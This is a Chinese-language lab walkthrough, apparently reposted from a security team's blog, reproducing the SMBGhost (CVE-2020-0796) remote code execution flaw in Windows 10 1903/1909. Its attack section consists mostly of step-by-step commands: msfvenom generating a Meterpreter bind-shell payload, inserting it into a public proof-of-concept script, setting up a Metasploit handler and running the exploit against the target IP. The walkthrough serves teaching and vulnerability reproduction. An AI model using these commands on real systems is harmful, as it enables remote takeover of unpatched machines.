暂无图片
暂无图片
暂无图片
暂无图片
暂无图片

漏洞复现|CVE-2020-0796(永恒之黑)

灼剑安全团队 2021-08-31
1708

点击上方蓝字关注我们


0x01 前言

北京时间2020年3月12日晚上,微软发布了一个最新到SMB远程代码执行漏洞。SMB(Server Message Block)协议作为一种局域网文件共享传输协议,常被用来作为共享文件安全传输研究的平台。由于SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码,受黑客攻击的目标系统只要开机在线即可能被入侵。据了解,凡政府机构、企事业单位网络中采用Windows 10 1903之后的所有终端节点,如Windows家用版、专业版、企业版、教育版,Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标,Windows 7不受影响。被各大安全厂商命名为SMBGhost、EternalDarkness(“永恒之黑”)

0x02 影响范围

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)

0x03 测试环境

靶机:windows10 1903 x64    ip:172.16.127.134(关闭防火墙)
攻击机:MacOS ip:10.96.0.53

靶机地址:迅雷口令#X9861b84e#

漏洞检测工具:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

POC:https://github.com/chompie1337/SMBGhost_RCE_PoC

0x04 攻击利用

生成木马

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8888 -b '\x00' -i 1 -f python

#-p windows/x64/meterpreter/bind_tcp 设置payload为windows64位meterpreter控制台下的正向连接

#LPORT=8888 设置开发端口为6666
#-b '\x00' 设置在生成的程序中避免出现'\x00'
#-i 1 设置编码次数为一次
#-f python 设置生成python格式文件

生成shellcode

4.1、将生成的shellcode全部复制

4.2、打开POC文件夹的exploit.py(原文件)

然后替换字符

4.3、打开MSF监听

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 8888
set rhost 172.16.127.134
run

4.4、运行exploit.py脚本

python3 exploit.py -ip 172.16.127.134

若MSF控制台暂时无反应,则control+c终端,重新输入run0x05 END

只要exp执行成功即是system,但是shellcode极度不稳定,很容易卡死,靶机蓝屏,尤其注意只能以python3去执行脚本,其他版本我尝试后非常容易蓝屏。


☆ END ☆


长按关注

灼剑(Tsojan)安全团队



点个在看你最好看



文章转载自灼剑安全团队,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

评论